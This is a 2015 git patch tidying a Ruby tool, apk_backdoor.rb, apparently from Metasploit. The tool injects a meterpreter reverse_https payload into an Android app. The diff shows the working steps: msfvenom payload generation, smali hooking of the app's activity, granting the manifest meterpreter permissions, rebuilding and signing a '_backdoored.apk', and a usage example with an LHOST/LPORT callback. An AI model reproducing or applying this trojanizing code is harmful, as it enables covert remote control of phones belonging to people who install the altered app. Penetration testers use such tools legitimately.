From d1ed363a94a0e93252d1e9c634d5355595935f74 Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Tue, 22 Dec 2015 06:10:15 +0000
Subject: [PATCH] clean up apk_backdoor.rb

---
 tools/exploit/apk_backdoor.rb | 18 ++++++++++--------
 1 file changed, 10 insertions(+), 8 deletions(-)

diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb
index 18401b380d..c0d461d6d6 100755
--- a/tools/exploit/apk_backdoor.rb
+++ b/tools/exploit/apk_backdoor.rb
@@ -11,6 +11,10 @@ require 'fileutils'
 require 'optparse'
 require 'open3'
 
+def usage
+  $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
+  $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
+end
 
 def run_cmd(cmd)
   begin
@@ -142,8 +146,7 @@ end
 
 apkfile = ARGV[0]
 unless apkfile && File.readable?(apkfile)
-  $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
-  $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
+  usage
   exit(1)
 end
 
@@ -173,9 +176,8 @@ begin
     opts+=" "
   }
 rescue
-  $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
-  $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
   $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n"
+  usage
   exit(1)
 end
 
@@ -183,7 +185,7 @@ end
 tempdir = Dir.mktmpdir
 
 print "[*] Generating msfvenom payload..\n"
-msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom"))
+msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom"))
 res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1")
 if res.downcase.include?("error")
   $stderr.puts res
@@ -230,14 +232,14 @@ payloadhook = activitycreate + "\n    invoke-static {p0}, Lcom/metasploit/stage/
 hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
 print "[*] Loading ",smalifile," and injecting payload..\n"
 File.open(smalifile, "wb") {|file| file.puts hookedsmali }
-injected_apk=apkfile.split(".")[0] + "_backdoored.apk"
+injected_apk = apkfile.sub('.apk', '_backdoored.apk')
 
 print "[*] Poisoning the manifest with meterpreter permissions..\n"
 fix_manifest(tempdir)
 
-print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
+print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
 run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
-print "[*] Signing #{injected_apk} ..\n"
+print "[*] Signing #{injected_apk}\n"
 run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey")
 
 FileUtils.remove_entry tempdir